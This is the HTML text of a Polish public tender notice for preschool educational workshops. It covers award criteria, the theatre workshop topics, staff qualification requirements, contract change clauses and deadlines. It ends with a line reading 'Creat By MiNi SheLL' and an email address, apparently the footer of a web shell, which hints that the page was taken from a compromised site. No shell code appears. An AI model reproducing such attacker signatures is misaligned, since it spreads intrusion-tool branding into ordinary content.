Za najkorzystniejszą w zakresie danej części zostanie uznana oferta, która uzyska łącznie najwyższą liczbę punktów (Kryterium nr 1 + Kryterium nr 2).<br/>7. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium cena.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Elastyczność (gotowość do zmiany terminów zajęć)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Opis przedmiotu zamówienia dla Części III – spotkania z teatrem: warsztaty rozwijające kompetencje miękkie – 30 h w wymiarze 1 warsztat w miesiącu dla każdego OWP:<br/>1)	zamówienie obejmuje przeprowadzenie cyklu warsztatów edukacyjnych pn. „Spotkanie z teatrem”, których celem jest rozwój kompetencji miękkich dzieci w wieku przedszkolnym, w tym wstępna orientacja zawodowa oraz kształtowanie postaw prozdrowotnych. Tematyka zajęć: Nauka w praktyce, Odkrywcy natury, Spotkania z teatrem – została opracowana w sposób wykraczający poza obowiązującą podstawę programową, stanowiąc wartość dodaną w procesie wychowawczo-edukacyjnym,<br/>2)	tematy poruszane w spektaklach:<br/>a)	bezpieczeństwo (dzięki spektaklom info. na temat bezpieczeństwa lepiej zapadają w pamięć. Mali widzowie poznają scenariusze dotyczące bezpieczeństwa, 112, zasady bezpiecznego ruchu drogowego),<br/>b)	czas wolny (spektakle dotyczące spędzania czasu wolnego są inspiracją i wskazówką dla dzieci dotyczącą aktywności, rozwijania pasji, kontaktów towarzyskich. Pozwalają znaleźć lepszą alternatywę przynoszącą korzyści dla zdrowia fizycznego i psychicznego od rozrywek spędzanych z udziałem telewizji, internetu czy telefonu komórkowego),<br/>c)	dobre maniery (dzieci uczą się szacunku, uprzejmości i życzliwości, pomagania innym, tolerancji),<br/>d)	ekologia (spektakle ekologiczne poruszają tematy związane z ochroną przyrody, zanieczyszczeniem środowiska, oszczędnością wody, gospodarką odpadami, czy marnowaniem żywności),<br/>e)	higiena i dbanie o zdrowie,<br/>f)	tradycje i obrzędy,<br/>g)	praca zespołowa,<br/>h)	uniwersalne umiejętności społeczne i ich zalety w różnych zawodach,<br/>i)	zasady równości szans i równouprawnienia płci. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający dokonuje wyboru oferty odrębnie dla każdej części zamówienia, w oparciu o niżej wymienione kryteria oceny ofert.<br/>2.Kryterium nr 1:<br/>1) Cena (waga kryterium – 60%) – według następującego wzoru:<br/>Liczba punktów = najniższa zaoferowana cena za daną część zamówienia brutto / cena za daną część zamówienia brutto w badanej ofercie x waga kryterium.<br/>2) Do oceny przyjmuje się cenę za wykonanie danej części zamówienia brutto (z podatkiem VAT).<br/>3) Przyjmuje się, że 1% = 1 pkt i tak zostanie przeliczona liczba uzyskanych punktów.<br/>3. Kryterium nr 2:<br/>1) Elastyczność (gotowość do zmian terminów zajęć) –(waga kryterium – 40%) – według następujących zasad:<br/>a) najwyższą liczbę punktów otrzyma oferta zawierająca najkrótszy okres (liczony w dniach kalendarzowych, podanych w wartościach różnych od „0”) liczony od dnia przekazania Wykonawcy przez Zamawiającego wezwania do rozpoczęcia/zmiany/odwołania terminu realizacji zajęć w danej grupie, do dnia jego wykonania.<br/>Termin reakcji Wykonawcy na wezwanie, rozpoczyna bieg od dnia następnego po dniu, w którym Wykonawca wezwanie otrzymał i upływa w dniu, w którym Wykonawca się do niego zastosował. Przykładowo: Wykonawca który zadeklarował 1 dzień w kryterium „Elastyczność”, w przypadku jeśli otrzymał we wtorek 21.10. wezwanie w sprawie zmiany terminu zajęć z czwartku 23.10. na środę 22.10. jest zobowiązany do przeniesienia zajęć na środę 22.10. (tj. na następny dzień po otrzymaniu wezwania), <br/>b) najkrótszy okres to 1 dzień zaś najdłuższy to 5 dni, przy czym punkty będą przyznane zgodnie z poniższą tabelą:<br/>Oferowana liczba dni - Liczba punktów<br/>5 dni - 0,00<br/>4 dni - 5,00<br/>3 dni - 15,00<br/>2 dni - 30,00<br/>1 dzień - 40,00<br/>2) W sytuacji, gdy Wykonawca nie poda w ofercie terminu gotowości do zmiany, przyjmuje się, że oferuje zmianę terminu rozpoczęcia/zmiany/odwołania zajęć w najdłuższym dopuszczalnym terminie wynoszącym 5 dni, co oznacza, że Zamawiający przyzna 0,00 pkt w kryterium nr 2.<br/>3) W sytuacji, gdy Wykonawca poda w ofercie termin gotowości do zmiany dłuższy niż 5 dni, jego oferta będzie podlegała odrzuceniu, jako niezgodna z treścią zapytania ofertowego.<br/>4. Przyjmuje się, że 1% = 1 pkt i tak zostanie przeliczona liczba uzyskanych punktów.<br/>5. Oferty zostaną ocenione przez Zamawiającego w oparciu o łączną wagę kryteriów równą 100%.<br/>6. Za najkorzystniejszą w zakresie danej części zostanie uznana oferta, która uzyska łącznie najwyższą liczbę punktów (Kryterium nr 1 + Kryterium nr 2).<br/>7. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium cena.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Elastyczność (gotowość do zmiany terminów zajęć)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udział w postępowaniu mogą ubiegać się Wykonawcy spełniający następujący warunek:<br/>1)	o udzielenie zamówienia w Części I mogą ubiegać się Wykonawcy, którzy dysponują, co najmniej jedną osobą, która:<br/>a)	posiada wykształcenie wyższe (studia, studia podyplomowe lub kurs) <br/>o profilu pedagogicznym lub psychologicznym,<br/>b)	posiada uprawnienia pedagogiczne,<br/>c)	posiada co najmniej dwuletnie doświadczenie w pracy dydaktycznej z dziećmi,<br/>d)	ukończyła kurs lub studia podyplomowe w zakresie robotyki lub programowania lub posiada doświadczenie w pracy z dziećmi w tym zakresie zdobyte w ciągu ostatnich 3 lat – licząc od dnia terminu składania ofert,<br/>e)	przedłoży aktualne zaświadczenie o niekaralności z Krajowego Rejestru Karnego oraz informację z Rejestru sprawców przestępstw na tle seksualnym potwierdzającą brak wpisu.<br/>2)	o udzielenie zamówienia w Części II mogą ubiegać się Wykonawcy, którzy dysponują, co najmniej jedną osobą, która:<br/>a)	posiada wykształcenie wyższe (studia, studia podyplomowe lub kurs) w zakresie pedagogiki lub psychologii,<br/>b)	posiada uprawnienia pedagogiczne,<br/>c)	posiada co najmniej dwuletnie doświadczenie w pracy dydaktycznej z dziećmi, <br/>d)	ukończyła kurs lub studia podyplomowe w zakresie robotyki lub programowania lub posiada doświadczenie w pracy z dziećmi w tym zakresie zdobyte w okresie ostatnich 3 lat – licząc od dnia terminu składania ofert,<br/>e)	przedłoży aktualne zaświadczenie o niekaralności z Krajowego Rejestru Karnego oraz informację z Rejestru sprawców przestępstw na tle seksualnym potwierdzającą brak wpisu.<br/>3)	o udzielenie zamówienia w Części III mogą ubiegać się Wykonawcy, którzy dysponują, co najmniej jedną osobą, która:<br/>a)	posiada wykształcenie wyższe (studia, studia podyplomowe lub kurs) w zakresie pedagogiki lub psychologii,<br/>b)	posiada uprawnienia pedagogiczne,<br/>c)	posiada co najmniej dwuletnie doświadczenie w pracy dydaktycznej z dziećmi,<br/>d)	ukończyła kurs lub studia podyplomowe w zakresie rozwijania u dzieci umiejętności uczenia się i kreatywności lub posiada doświadczenie w pracy z dziećmi w tym zakresie zdobyte w ciągu ostatnich 3 lat – licząc od dnia terminu składania ofert,<br/>e)	przedłoży aktualne zaświadczenie o niekaralności z Krajowego Rejestru Karnego oraz informację z Rejestru sprawców przestępstw na tle seksualnym potwierdzającą brak wpisu.<br/>2.	Jeżeli Wykonawca składa ofertę na więcej niż jedną część zamówienia w celu wykazania, że posiada wymagane zdolności techniczne i zawodowe zapewniające należyte wykonanie zamówienia musi wykazać, że dysponuje lub będzie dysponował wymaganymi osobami, w każdej części odrębnie, inna osoba.<br/>3.	Wymagane doświadczenie zawodowe wszystkich osób, o których mowa w ust. 3 niniejszego działu należy liczyć według następujących zasad:<br/>1)	podczas liczenia okresu doświadczenia zawodowego w pracy poszczególnych osób należy przyjąć zasadę, że nakładające się na siebie okresy nie sumują się,<br/>2)	dane potwierdzające okresy doświadczenia powinny wynikać z treści wykazu osób, z uwagi na powyższe, wymaga się podania dokładnych dat rozpoczęcia i zakończenia pełnienia wymaganego warunkiem udziału doświadczenia,<br/>3)	w treści wykazu osób, Wykonawcy winni przedstawić dane precyzyjnie, a podając daty rozpoczęcia lub zakończenia danego okresu powinni wskazać je z dokładnością roku i miesiąca i dnia,<br/>4)	w przypadku braku wskazania pełnej daty dziennej początku realizacji, do przeliczenia „doświadczenia” Zamawiający przyjmie – następny miesiąc po wskazanym miesiącu przy rozpoczęciu prac, tj. przykładowo, w przypadku wskazania wyłącznie daty: 04.2023 r. – 30.09.2023 r. – Zamawiający przyjmie do oceny wyłącznie 5 m-cy, tj. maj, czerwiec, lipiec, sierpień, wrzesień, nie uwzględniając kwietnia,<br/>5)	w przypadku braku wskazania pełnej daty dziennej końca wskazanej realizacji, do przeliczenia „doświadczenia” Zamawiający przyjmie – pełny miesiąc poprzedzający miesiąc wskazany przy zakończeniu prac, tj. przykładowo, w przypadku wskazania wyłącznie daty: 01.04.2023 r. - 08.2023 r. – Zamawiający przyjmie do oceny wyłącznie 4 m-ce, tj. kwiecień, maj, czerwiec, lipiec, nie uwzględniając sierpnia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Na potwierdzenie braku podstaw do wykluczenia z postępowania, Wykonawca składa oświadczenie o braku podstaw do wykluczenia, sporządzone według wzoru stanowiącego Załącznik nr 2 do SWZ, aktualne na dzień składania ofert i składane wraz z ofertą.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Na potwierdzenie spełniania warunków udziału w postępowaniu, Wykonawca składa wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, według wzoru stanowiącego Załącznik nr 4 do SWZ, aktualne na dzień składania ofert i składane wraz z ofertą.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zmiana lub uzupełnienie niniejszej umowy wymaga formy pisemnej pod rygorem nieważności.<br/>2.	Dopuszcza się zmianę postanowień zawartej umowy w przypadkach: <br/>1)	wymaganych przepisem art. 439 PZP, to jest w przypadku gdy:<br/>a)	w okresie od dnia podpisania umowy do dnia 30 czerwca 2026 r. (lub jeśli termin realizacji Umowy zostanie przedłużony za zgodą Zamawiającego – do dnia terminu zmienionego) poziom cen usług edukacyjnych (publikowany przez Prezesa Głównego Urzędu Statystycznego, w ramach cen towarów i usług konsumpcyjnych) zmieni się o więcej niż 15%,<br/>b)	w przypadku zaistnienia przesłanki opisanej wyżej, Wykonawca zwraca się do Zamawiającego z żądaniem zawarcia aneksu do umowy, poprzez zwiększenie należnego wynagrodzenia. Zmiana wynagrodzenia następuje poprzez jego zwiększenie o poziom wzrostu cen towarów i usług ponad poziom opisany przy lit. a) (w ten sposób, że od zsumowanego poziomu wzrostu cen usług edukacyjnych podawanych przez Prezesa GUS odejmuje się 15%) i wyłącznie w zakresie w jakim dotyczy to jeszcze niezrealizowanych przez Wykonawcę usług,<br/>c)	podstawą do ustalenia wzrostu poziomu usług są wyłącznie kwartalne komunikaty Prezesa Głównego Urzędu Statystycznego – wyklucza się dokonania podwyżki wynagrodzenia na podstawie informacji sygnalnych,<br/>2)	w przypadku okolicznościach niezależnych od Zamawiającego lub Wykonawcy, które powodowały brak możliwości wykonania umowy i w terminie lub w przypadku uzyskania zgody Instytucji Zarządzającej, Zamawiający może przedłużyć termin realizacji zamówieni o okres istnienia tych okoliczności lub o okres na jaki zgodziła się Instytucja Zarządzająca,<br/>3)	dopuszcza się zmianę liczebności grup oraz liczby tych grup o nie więcej niż 20% w zależności od rekrutacji, pod warunkiem że zmiany te zaakceptuje Instytucja Zarządzająca. W związku z tym wynagrodzenie Wykonawcy może ulec proporcjonalnej zmianie – w zależności od tego, jaki wpływ zmiana ilości uczestników wpłynie na liczbę godzin zajęć, które będzie musiał zrealizować Wykonawca. <br/>3.	W razie wystąpienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili jej zawarcia, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach. <br/>4.	W przypadku, o którym mowa w ust. 3 Wykonawca może żądać wyłącznie wynagrodzenia należnego mu z tytułu już wykonanej części umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-11-17 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-11-17 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com